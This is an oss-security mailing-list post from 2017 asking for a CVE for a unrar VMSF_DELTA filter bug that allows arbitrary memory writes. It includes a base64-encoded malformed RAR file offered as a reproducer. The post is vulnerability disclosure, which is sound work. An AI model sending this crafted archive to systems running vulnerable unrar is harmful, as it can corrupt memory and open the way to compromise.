Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 21 Jun 2017 14:20:01 +0200
From: Alexander Bergmann <abergmann@...e.com>
To: oss-security@...ts.openwall.com
Cc: cve-assign@...re.org
Subject: CVE Request: unrar: VMSF_DELTA filter allows arbitrary memory write

Hi,

It was reported that unrar fixed a VMSF_DELTA memory corruption issue in
there latest version unrarsrc-5.5.5.tar.gz. This problem was reported to
Sophos AV in 2012 but never reach upstream rar.

https://bugs.chromium.org/p/project-zero/issues/detail?id=1286&desc=6#maincol

Reproducer:

Base64-encoded RAR file to trigger the VMSF_DELTA issue:

UmFyIRoHAPlOcwAADgAAAAAAAAAAMAh0AAAmAI4AAAAAAAAAAhBBUiEAAAAAHQAGAAAAACBzdGRv
dXQgIVUMzRDNmBGByDAda+AXaSv4KvQr1K/oejL05mXmXmww5tEk8gA9k8nmieyeyeswuOR6cx69
a2Hd6zQwu3aoMDDwMEswADAAMD4P938w+dydoRFwAmwAAAAAvv////+/////+9W3QFgAAQAGAAAA
Ooimhd12AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

As far as I can tell no CVE was assigned to this issue so far.


Regrads,
Alex~

-- 
Alexander Bergmann <abergmann@...e.com>, Security Engineer, GPG:9FFA4886
SUSE Linux GmbH, GF: Felix Imendörffer, Jane Smithard, Graham Norton
HRB 21284 (AG Nürnberg)

[ CONTENT OF TYPE application/pgp-signature SKIPPED ]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ